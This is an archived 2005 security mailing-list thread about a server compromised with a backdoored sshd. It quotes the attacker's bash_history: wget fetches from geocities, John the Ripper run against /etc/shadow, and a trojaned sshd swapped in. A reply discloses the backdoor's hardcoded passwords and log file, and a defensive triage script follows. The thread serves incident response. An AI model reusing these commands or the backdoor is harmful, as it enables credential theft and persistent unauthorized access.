Security Incidents mailing list archives

Re: SSH compiled with backdoor


From: "VeNoMouS" <venom () gen-x co nz>
Date: Tue, 30 Aug 2005 15:17:48 +1200

Hi Steve, I actually wrote that patch back in, like, shit, 2001 or something. It
logs all SSH connection logins in plain text to a txt file; it also puts a
backdoor passwd into the sshd and won't show up in wtmp, making the user (whatever
he logs in as) invisible, so say you log in with the username root and
use the global hidden passwd, it will allow him on as root.

Looking at the code, he uses the following passwds for this global passwd:
"toji" and "fv11r01rc3@l"

The file that logs all the logins with timestamps and src IPs is "dev/saux".


Hope this helps you; if you require any further information, email me back. It's
been a few years since I even looked at this code.

---------- Forwarded message ----------
From: steve () example org <steve () example org>
Date: 27 Aug 2005 13:02:08 -0000
Subject: SSH compiled with backdoor
To: incidents () securityfocus com


Hi!

One of my web servers was hacked on July 17, 2005.  bash_history showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected.  From looking in all the bash_history, it
appears the hacker came in from the website account, and did an su
from there.

I found this about a month later when I logged into the box, did an
ls, only to be met by a seg fault.  A ps x showed mech.tgz trying to
be downloaded, and a bunch of other CRON processes running.  The auth
log didn't show other logins, though, so the ssh installed must have
logging turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files
on my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15         (37+11:47)
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)

whois says:
inetnum:      193.231.77.0 - 193.231.77.255
netname:      DATANET-RO
descr:        Starnets - Datanet
country:      RO
address:      DATA NET
address:      Str. Ioan N. Roman Nr. 13
address:      Constanta, cod 900199, ROMANIA

Best Regards,

Steve
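A defender-side triage script for the three indicators this thread describes (a credential log parked under /dev, a replaced /usr/sbin/sshd, and the original binary stashed away in /lib/java), added here as an example and not part of either post; the reference hash and the directories to scan are assumptions passed in as arguments.

```shell
#!/bin/sh
# Post-incident triage for the backdoored-sshd pattern in the thread above.
# Added example; every path and the known-good hash are assumptions supplied
# by the caller (e.g. the sshd hash from a trusted copy of the distro package).
# Requires sha256sum (GNU coreutils) and a find(1) that supports -xdev.

# 1. The backdoor logs credentials to "dev/saux". Only device nodes, directories,
#    symlinks and FIFOs belong under /dev, so any regular file there is suspect.
regular_files_under() {
    # $1: directory to scan (normally /dev); prints one path per line
    find "$1" -xdev -type f 2>/dev/null
}

# 2. bash_history shows /usr/sbin/sshd replaced with a freshly built binary.
#    Compare the installed binary against a known-good SHA-256.
sshd_hash_matches() {
    # $1: path to sshd binary, $2: expected sha256 in hex; exit status is the verdict
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# 3. The original sshd was copied into /lib/java before being removed. Look for
#    files named sshd anywhere except the one legitimate location.
stray_sshd_copies() {
    # $1: root to search, $2: the legitimate sshd path to exclude
    find "$1" -xdev -type f -name sshd ! -path "$2" 2>/dev/null
}

# Typical invocation on a live host (assumed paths, reference hash from a trusted source):
#   regular_files_under /dev
#   sshd_hash_matches /usr/sbin/sshd "$REFERENCE_SHA256" || echo "sshd hash mismatch"
#   stray_sshd_copies / /usr/sbin/sshd
```

A hit from any of the three checks is a reason to treat the host as compromised and rebuild it from known-good media rather than to clean it in place.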
